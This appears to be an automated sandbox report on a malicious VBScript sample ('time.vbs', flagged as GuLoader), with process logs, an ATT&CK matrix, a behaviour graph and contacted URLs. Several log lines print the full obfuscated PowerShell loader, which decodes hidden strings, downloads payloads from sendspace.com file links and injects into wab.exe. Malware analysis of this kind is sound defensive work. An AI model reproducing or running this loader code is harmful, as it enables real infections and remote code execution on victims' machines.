              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$palaverist = 1;$massesamfund='su';$massesamfund+='bstrin';$massesamfund+='g';function lnkampene($thurlsvaflers){$uindfriede=$thurlsvaflers.length-$palaverist;for($thurl=5;$thurl -lt $uindfriede;$thurl+=6){$tachyglossate+=$thurlsvaflers.$massesamfund.invoke( $thurl, $palaverist);}$tachyglossate;}function kolesterol($overanxious){& ($maimedly) ($overanxious);}$skovbrandsbekmpelses=lnkampene ' premmjule o ped,zrognfi.artel ricilrepleaaphan/ pr n5wardl. cong0co ta t,ead(akupuwf,rjti cottn teledclarioentrewanke spetio ti.banenknntcomp kad,1fejll0 korp. bro.0 pul ;logpe offsw dispipleninbasen6 avin4korri;stemm ha.ndx unfr6,irkl4sm,ak;aflev defenrinfervbedk :lokal1 baml2asbes1frais.alumi0palp )gastr subgeg,retse a,tncslavekamideoscann/pec,i2und r0disma1 co.n0cornc0 ispr1belly0 naup1partr tretftroelipanglrdeprae pne fjowl o drabxgadef/suffl1 rrbl2e,nea1dbend.rele,0semic ';$organismers=lnkampene 'ligegu ,anks an,mefolier,krob-equiva ibr gwalloedetonnchamotbedri ';$skadevolderne=lnkampene 'vizirhrashnt migatf gtip.imels frem:kampe/nonou/solsowdisc,wminidwdelag.wardesridese extons ippdrungeslyterppostiasten clegate bo t.sup rcretroo.etalms.kbr/salvapk,ansr w leoschan/psychd redelmezzo/lyspaebl,nhx alstwslage2lungeohomel1foreg ';$malaxate=lnkampene 'd.bri>fiske ';$maimedly=lnkampene 'mudpuipadeye.rescx te.t ';$whammo='impery';kolesterol (lnkampene ' theosfamile.ranstdomi,-ac,tac,ppliodiskrn c tot,lackethecon ,icht mou cento-nontrpse.dea r.trtunic,hgynan mangt fies: adt.\h.ftamtrafiu guldfshapefkasseerekrnnfinge. promtfore xstat,tgaypo ylvas-korrevcr noahypotlcatheudrueme ko,p comm,$beredwvl inhbass.avedhnmsubsum somo raas;semi ');kolesterol (lnkampene 'whem ieft rf reti skygg(arakatmajore attsam,hit alek- ,ardph,rdsa agritsnorehimpli produtwhore:fragr\,eostmsarkoue,spafmon,pf gen,etilsknopede. fragtha.tixfarvetgadsh)symph{telefe bltexbloduidisoctleean}.rysa;humbu ');$prevascular = lnkampene 'stabiegstelc regnhs.lkeo harm vi.r%for.ba solcpsamkvpu valdfondsa.rejetdet,eatilen%redef\pi.tro pri.marcanrzoogry bills ortrtmaskinkarnfia,lurn,ragmgfo,egecatchrunbeg.houndd limai noelmravne ste.b&tragt&divel pseudepaatrc etceh halvoblee, met o$krmme ';kolesterol (lnkampene ' m gg$restagforfilsnippocos.obforfaa leg,lberbe:ubetnb dehoneksp.kbordee su.e=aphel(driftcsydamm comidb dki ,iffi/ha rscgenio fuldb$faysgptot,lrprepse hepavverdeaudstrssnrencbrudeuballalconseamilitrafnaz)foreb ');kolesterol (lnkampene 'sving$ironwg invelme,leos,minbam,era ,utrlbille:mi,strwrigluant oftos afaffete,lammrfrasesprotokhypere,ontrrinte.= read$ oversmaterkhul,oaretssdincepevo.acvbesk,o .analenergd enlaetubulrk nnen s,ogeanglo.s.lgssneocopopa tloprekitheoptcalli( syst$ uphemattacacaddilbabelaborttxkr dsainfertpraktet.kpr)isog, ');$skadevolderne=$ruffersker[0];kolesterol (lnkampene ',arte$saloogberunl sorto,pisubtempeacaliflp egr: forsb exciawheredmoluciodzooncing
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$palaverist = 1;$massesamfund='su';$massesamfund+='bstrin';$massesamfund+='g';function lnkampene($thurlsvaflers){$uindfriede=$thurlsvaflers.length-$palaverist;for($thurl=5;$thurl -lt $uindfriede;$thurl+=6){$tachyglossate+=$thurlsvaflers.$massesamfund.invoke( $thurl, $palaverist);}$tachyglossate;}function kolesterol($overanxious){& ($maimedly) ($overanxious);}$skovbrandsbekmpelses=lnkampene ' premmjule o ped,zrognfi.artel ricilrepleaaphan/ pr n5wardl. cong0co ta t,ead(akupuwf,rjti cottn teledclarioentrewanke spetio ti.banenknntcomp kad,1fejll0 korp. bro.0 pul ;logpe offsw dispipleninbasen6 avin4korri;stemm ha.ndx unfr6,irkl4sm,ak;aflev defenrinfervbedk :lokal1 baml2asbes1frais.alumi0palp )gastr subgeg,retse a,tncslavekamideoscann/pec,i2und r0disma1 co.n0cornc0 ispr1belly0 naup1partr tretftroelipanglrdeprae pne fjowl o drabxgadef/suffl1 rrbl2e,nea1dbend.rele,0semic ';$organismers=lnkampene 'ligegu ,anks an,mefolier,krob-equiva ibr gwalloedetonnchamotbedri ';$skadevolderne=lnkampene 'vizirhrashnt migatf gtip.imels frem:kampe/nonou/solsowdisc,wminidwdelag.wardesridese extons ippdrungeslyterppostiasten clegate bo t.sup rcretroo.etalms.kbr/salvapk,ansr w leoschan/psychd redelmezzo/lyspaebl,nhx alstwslage2lungeohomel1foreg ';$malaxate=lnkampene 'd.bri>fiske ';$maimedly=lnkampene 'mudpuipadeye.rescx te.t ';$whammo='impery';kolesterol (lnkampene ' theosfamile.ranstdomi,-ac,tac,ppliodiskrn c tot,lackethecon ,icht mou cento-nontrpse.dea r.trtunic,hgynan mangt fies: adt.\h.ftamtrafiu guldfshapefkasseerekrnnfinge. promtfore xstat,tgaypo ylvas-korrevcr noahypotlcatheudrueme ko,p comm,$beredwvl inhbass.avedhnmsubsum somo raas;semi ');kolesterol (lnkampene 'whem ieft rf reti skygg(arakatmajore attsam,hit alek- ,ardph,rdsa agritsnorehimpli produtwhore:fragr\,eostmsarkoue,spafmon,pf gen,etilsknopede. fragtha.tixfarvetgadsh)symph{telefe bltexbloduidisoctleean}.rysa;humbu ');$prevascular = lnkampene 'stabiegstelc regnhs.lkeo harm vi.r%for.ba solcpsamkvpu valdfondsa.rejetdet,eatilen%redef\pi.tro pri.marcanrzoogry bills ortrtmaskinkarnfia,lurn,ragmgfo,egecatchrunbeg.houndd limai noelmravne ste.b&tragt&divel pseudepaatrc etceh halvoblee, met o$krmme ';kolesterol (lnkampene ' m gg$restagforfilsnippocos.obforfaa leg,lberbe:ubetnb dehoneksp.kbordee su.e=aphel(driftcsydamm comidb dki ,iffi/ha rscgenio fuldb$faysgptot,lrprepse hepavverdeaudstrssnrencbrudeuballalconseamilitrafnaz)foreb ');kolesterol (lnkampene 'sving$ironwg invelme,leos,minbam,era ,utrlbille:mi,strwrigluant oftos afaffete,lammrfrasesprotokhypere,ontrrinte.= read$ oversmaterkhul,oaretssdincepevo.acvbesk,o .analenergd enlaetubulrk nnen s,ogeanglo.s.lgssneocopopa tloprekitheoptcalli( syst$ uphemattacacaddilbabelaborttxkr dsainfertpraktet.kpr)isog, ');$skadevolderne=$ruffersker[0];kolesterol (lnkampene ',arte$saloogberunl sorto,pisubtempeacaliflp egr: forsb exciawheredmoluciodzooncing
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$palaverist = 1;$massesamfund='su';$massesamfund+='bstrin';$massesamfund+='g';function lnkampene($thurlsvaflers){$uindfriede=$thurlsvaflers.length-$palaverist;for($thurl=5;$thurl -lt $uindfriede;$thurl+=6){$tachyglossate+=$thurlsvaflers.$massesamfund.invoke( $thurl, $palaverist);}$tachyglossate;}function kolesterol($overanxious){& ($maimedly) ($overanxious);}$skovbrandsbekmpelses=lnkampene ' premmjule o ped,zrognfi.artel ricilrepleaaphan/ pr n5wardl. cong0co ta t,ead(akupuwf,rjti cottn teledclarioentrewanke spetio ti.banenknntcomp kad,1fejll0 korp. bro.0 pul ;logpe offsw dispipleninbasen6 avin4korri;stemm ha.ndx unfr6,irkl4sm,ak;aflev defenrinfervbedk :lokal1 baml2asbes1frais.alumi0palp )gastr subgeg,retse a,tncslavekamideoscann/pec,i2und r0disma1 co.n0cornc0 ispr1belly0 naup1partr tretftroelipanglrdeprae pne fjowl o drabxgadef/suffl1 rrbl2e,nea1dbend.rele,0semic ';$organismers=lnkampene 'ligegu ,anks an,mefolier,krob-equiva ibr gwalloedetonnchamotbedri ';$skadevolderne=lnkampene 'vizirhrashnt migatf gtip.imels frem:kampe/nonou/solsowdisc,wminidwdelag.wardesridese extons ippdrungeslyterppostiasten clegate bo t.sup rcretroo.etalms.kbr/salvapk,ansr w leoschan/psychd redelmezzo/lyspaebl,nhx alstwslage2lungeohomel1foreg ';$malaxate=lnkampene 'd.bri>fiske ';$maimedly=lnkampene 'mudpuipadeye.rescx te.t ';$whammo='impery';kolesterol (lnkampene ' theosfamile.ranstdomi,-ac,tac,ppliodiskrn c tot,lackethecon ,icht mou cento-nontrpse.dea r.trtunic,hgynan mangt fies: adt.\h.ftamtrafiu guldfshapefkasseerekrnnfinge. promtfore xstat,tgaypo ylvas-korrevcr noahypotlcatheudrueme ko,p comm,$beredwvl inhbass.avedhnmsubsum somo raas;semi ');kolesterol (lnkampene 'whem ieft rf reti skygg(arakatmajore attsam,hit alek- ,ardph,rdsa agritsnorehimpli produtwhore:fragr\,eostmsarkoue,spafmon,pf gen,etilsknopede. fragtha.tixfarvetgadsh)symph{telefe bltexbloduidisoctleean}.rysa;humbu ');$prevascular = lnkampene 'stabiegstelc regnhs.lkeo harm vi.r%for.ba solcpsamkvpu valdfondsa.rejetdet,eatilen%redef\pi.tro pri.marcanrzoogry bills ortrtmaskinkarnfia,lurn,ragmgfo,egecatchrunbeg.houndd limai noelmravne ste.b&tragt&divel pseudepaatrc etceh halvoblee, met o$krmme ';kolesterol (lnkampene ' m gg$restagforfilsnippocos.obforfaa leg,lberbe:ubetnb dehoneksp.kbordee su.e=aphel(driftcsydamm comidb dki ,iffi/ha rscgenio fuldb$faysgptot,lrprepse hepavverdeaudstrssnrencbrudeuballalconseamilitrafnaz)foreb ');kolesterol (lnkampene 'sving$ironwg invelme,leos,minbam,era ,utrlbille:mi,strwrigluant oftos afaffete,lammrfrasesprotokhypere,ontrrinte.= read$ oversmaterkhul,oaretssdincepevo.acvbesk,o .analenergd enlaetubulrk nnen s,ogeanglo.s.lgssneocopopa tloprekitheoptcalli( syst$ uphemattacacaddilbabelaborttxkr dsainfertpraktet.kpr)isog, ');$skadevolderne=$ruffersker[0];kolesterol (lnkampene ',arte$saloogberunl sorto,pisubtempeacaliflp egr: forsb exciawheredmoluciodzooncingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$palaverist = 1;$massesamfund='su';$massesamfund+='bstrin';$massesamfund+='g';function lnkampene($thurlsvaflers){$uindfriede=$thurlsvaflers.length-$palaverist;for($thurl=5;$thurl -lt $uindfriede;$thurl+=6){$tachyglossate+=$thurlsvaflers.$massesamfund.invoke( $thurl, $palaverist);}$tachyglossate;}function kolesterol($overanxious){& ($maimedly) ($overanxious);}$skovbrandsbekmpelses=lnkampene ' premmjule o ped,zrognfi.artel ricilrepleaaphan/ pr n5wardl. cong0co ta t,ead(akupuwf,rjti cottn teledclarioentrewanke spetio ti.banenknntcomp kad,1fejll0 korp. bro.0 pul ;logpe offsw dispipleninbasen6 avin4korri;stemm ha.ndx unfr6,irkl4sm,ak;aflev defenrinfervbedk :lokal1 baml2asbes1frais.alumi0palp )gastr subgeg,retse a,tncslavekamideoscann/pec,i2und r0disma1 co.n0cornc0 ispr1belly0 naup1partr tretftroelipanglrdeprae pne fjowl o drabxgadef/suffl1 rrbl2e,nea1dbend.rele,0semic ';$organismers=lnkampene 'ligegu ,anks an,mefolier,krob-equiva ibr gwalloedetonnchamotbedri ';$skadevolderne=lnkampene 'vizirhrashnt migatf gtip.imels frem:kampe/nonou/solsowdisc,wminidwdelag.wardesridese extons ippdrungeslyterppostiasten clegate bo t.sup rcretroo.etalms.kbr/salvapk,ansr w leoschan/psychd redelmezzo/lyspaebl,nhx alstwslage2lungeohomel1foreg ';$malaxate=lnkampene 'd.bri>fiske ';$maimedly=lnkampene 'mudpuipadeye.rescx te.t ';$whammo='impery';kolesterol (lnkampene ' theosfamile.ranstdomi,-ac,tac,ppliodiskrn c tot,lackethecon ,icht mou cento-nontrpse.dea r.trtunic,hgynan mangt fies: adt.\h.ftamtrafiu guldfshapefkasseerekrnnfinge. promtfore xstat,tgaypo ylvas-korrevcr noahypotlcatheudrueme ko,p comm,$beredwvl inhbass.avedhnmsubsum somo raas;semi ');kolesterol (lnkampene 'whem ieft rf reti skygg(arakatmajore attsam,hit alek- ,ardph,rdsa agritsnorehimpli produtwhore:fragr\,eostmsarkoue,spafmon,pf gen,etilsknopede. fragtha.tixfarvetgadsh)symph{telefe bltexbloduidisoctleean}.rysa;humbu ');$prevascular = lnkampene 'stabiegstelc regnhs.lkeo harm vi.r%for.ba solcpsamkvpu valdfondsa.rejetdet,eatilen%redef\pi.tro pri.marcanrzoogry bills ortrtmaskinkarnfia,lurn,ragmgfo,egecatchrunbeg.houndd limai noelmravne ste.b&tragt&divel pseudepaatrc etceh halvoblee, met o$krmme ';kolesterol (lnkampene ' m gg$restagforfilsnippocos.obforfaa leg,lberbe:ubetnb dehoneksp.kbordee su.e=aphel(driftcsydamm comidb dki ,iffi/ha rscgenio fuldb$faysgptot,lrprepse hepavverdeaudstrssnrencbrudeuballalconseamilitrafnaz)foreb ');kolesterol (lnkampene 'sving$ironwg invelme,leos,minbam,era ,utrlbille:mi,strwrigluant oftos afaffete,lammrfrasesprotokhypere,ontrrinte.= read$ oversmaterkhul,oaretssdincepevo.acvbesk,o .analenergd enlaetubulrk nnen s,ogeanglo.s.lgssneocopopa tloprekitheoptcalli( syst$ uphemattacacaddilbabelaborttxkr dsainfertpraktet.kpr)isog, ');$skadevolderne=$ruffersker[0];kolesterol (lnkampene ',arte$saloogberunl sorto,pisubtempeacaliflp egr: forsb exciawheredmoluciodzooncingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446630 Sample: time.vbs Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 28 www.sendspace.com 2->28 30 fs13n4.sendspace.com 2->30 32 fs12n1.sendspace.com 2->32 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 Yara detected GuLoader 2->48 50 3 other signatures 2->50 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 52 VBScript performs obfuscated calls to suspicious functions 9->52 54 Suspicious powershell command line found 9->54 56 Wscript starts Powershell (via cmd or directly) 9->56 58 3 other signatures 9->58 12 powershell.exe 14 19 9->12         started        process6 dnsIp7 36 fs13n4.sendspace.com 69.31.136.57, 443, 49731 GTT-BACKBONEGTTDE United States 12->36 38 www.sendspace.com 172.67.170.105, 443, 49730, 49739 CLOUDFLARENETUS United States 12->38 60 Suspicious powershell command line found 12->60 62 Very long command line found 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 16 powershell.exe 17 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 40 Writes to foreign memory regions 16->40 42 Found suspicious powershell code related to unpacking or dynamic code loading 16->42 23 wab.exe 16 16->23         started        26 cmd.exe 1 16->26         started        process11 dnsIp12 34 fs12n1.sendspace.com 69.31.136.53, 443, 49740 GTT-BACKBONEGTTDE United States 23->34

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              time.vbs8%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/exw2o1P0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/exw2o1XR0%Avira URL Cloudsafe
              https://fs13n4.sendspace.com0%Avira URL Cloudsafe
              https://fs13n4.sendspaX0%Avira URL Cloudsafe
              https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/exw2o10%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/dvbcvt0%Avira URL Cloudsafe
              https://go.microsoft.c0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              http://fs13n4.sendspace.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs13n4.sendspace.com
              		69.31.136.57
              		truefalse
                		unknown
                fs12n1.sendspace.com
                		69.31.136.53
                		truefalse
                  		unknown
                  www.sendspace.com
                  		172.67.170.105
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.sendspace.com/pro/dl/exw2o1false
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/dvbcvtfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.binfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/exw2o1Ppowershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://go.microsoft.cpowershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://go.micropowershell.exe, 00000001.00000002.2531372219.0000015C2EDAF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
